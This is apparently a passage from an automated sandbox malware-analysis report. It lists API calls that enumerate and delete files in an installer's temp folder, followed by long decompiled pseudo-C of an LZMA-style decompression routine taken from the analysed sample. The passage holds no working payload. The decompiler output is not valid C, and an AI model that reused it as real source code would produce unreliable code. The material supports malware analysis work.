                            0x00405e75
                            0x00000000
                            0x00405e6b
                            0x00405e39
                            0x00405e41
                            0x00000000
                            0x00000000
                            0x00405e43
                            0x00405e4b
                            0x00000000
                            0x00000000
                            0x00405e4d
                            0x00405e55
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405eb6
                            0x00405ebe
                            0x00405ec4
                            0x00405ec4
                            0x00405ecd
                            0x00000000
                            0x00405ecd
                            0x00405df8
                            0x00405e00
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405dbc
                            0x00405dbc
                            0x00405dbe
                            0x00405ede
                            0x00405ee0
                            0x00405ee3
                            0x00405f34
                            0x00405f34
                            0x00405f34
                            0x00405ee5
                            0x00405ee8
                            0x00405ef3
                            0x00405ef8
                            0x00405efa
                            0x00000000
                            0x00000000
                            0x00405efd
                            0x00405f09
                            0x00405f0e
                            0x00405f10
                            0x00000000
                            0x00405f2b
                            0x00405f12
                            0x00405f15
                            0x00000000
                            0x00000000
                            0x00405f1a
                            0x00000000
                            0x00405f21
                            0x00405eea
                            0x00405eea
                            0x00000000
                            0x00405eea
                            0x00405dc4
                            0x00405dc7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405dc7

                            APIs
                            • DeleteFileW.KERNELBASE(?,?,766DFAA0,766DF560,00000000), ref: 00405D9D
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,\*.*), ref: 00405DE5
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E0E
                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E1E
                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                            • FindClose.KERNELBASE(00000000), ref: 00405ECD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*$\*.*
                            • API String ID: 2035342205-3765450062
                            • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                            • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 630 406d5f-406d64 631 406dd5-406df3 630->631 632 406d66-406d95 630->632 633 4073cb-4073e0 631->633 634 406d97-406d9a 632->634 635 406d9c-406da0 632->635 636 4073e2-4073f8 633->636 637 4073fa-407410 633->637 638 406dac-406daf 634->638 639 406da2-406da6 635->639 640 406da8 635->640 641 407413-40741a 636->641 637->641 642 406db1-406dba 638->642 643 406dcd-406dd0 638->643 639->638 640->638 647 407441-40744d 641->647 648 40741c-407420 641->648 644 406dbc 642->644 645 406dbf-406dcb 642->645 646 406fa2-406fc0 643->646 644->645 649 406e35-406e63 645->649 653 406fc2-406fd6 646->653 654 406fd8-406fea 646->654 656 406be3-406bec 647->656 650 407426-40743e 648->650 651 4075cf-4075d9 648->651 657 406e65-406e7d 649->657 658 406e7f-406e99 649->658 650->647 655 4075e5-4075f8 651->655 659 406fed-406ff7 653->659 654->659 663 4075fd-407601 655->663 660 406bf2 656->660 661 4075fa 656->661 662 406e9c-406ea6 657->662 658->662 664 406ff9 659->664 665 406f9a-406fa0 659->665 667 406bf9-406bfd 660->667 668 406d39-406d5a 660->668 669 406c9e-406ca2 660->669 670 406d0e-406d12 660->670 661->663 672 406eac 662->672 673 406e1d-406e23 662->673 681 407581-40758b 664->681 682 406f7f-406f97 664->682 665->646 671 406f3e-406f48 665->671 667->655 674 406c03-406c10 667->674 668->633 683 406ca8-406cc1 669->683 684 40754e-407558 669->684 675 406d18-406d2c 670->675 676 40755d-407567 670->676 677 40758d-407597 671->677 678 406f4e-407117 671->678 689 406e02-406e1a 672->689 690 407569-407573 672->690 679 406ed6-406edc 673->679 680 406e29-406e2f 673->680 674->661 688 406c16-406c5c 674->688 691 406d2f-406d37 675->691 676->655 677->655 678->656 686 406f3a 679->686 687 406ede-406efc 679->687 680->649 680->686 681->655 682->665 693 406cc4-406cc8 683->693 684->655 686->671 694 406f14-406f26 687->694 695 406efe-406f12 687->695 696 406c84-406c86 688->696 697 406c5e-406c62 688->697 689->673 690->655 691->668 691->670 693->669 698 406cca-406cd0 693->698 701 406f29-406f33 694->701 695->701 704 406c94-406c9c 696->704 705 406c88-406c92 696->705 702 406c64-406c67 GlobalFree 697->702 703 406c6d-406c7b GlobalAlloc 697->703 699 406cd2-406cd9 698->699 700 406cfa-406d0c 698->700 706 406ce4-406cf4 GlobalAlloc 699->706 707 406cdb-406cde GlobalFree 699->707 700->691 701->679 708 406f35 701->708 702->703 703->661 709 406c81 703->709 704->693 705->704 705->705 706->661 706->700 707->706 711 407575-40757f 708->711 712 406ebb-406ed3 708->712 709->696 711->655 712->679
                            C-Code - Quality: 98%
                            			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
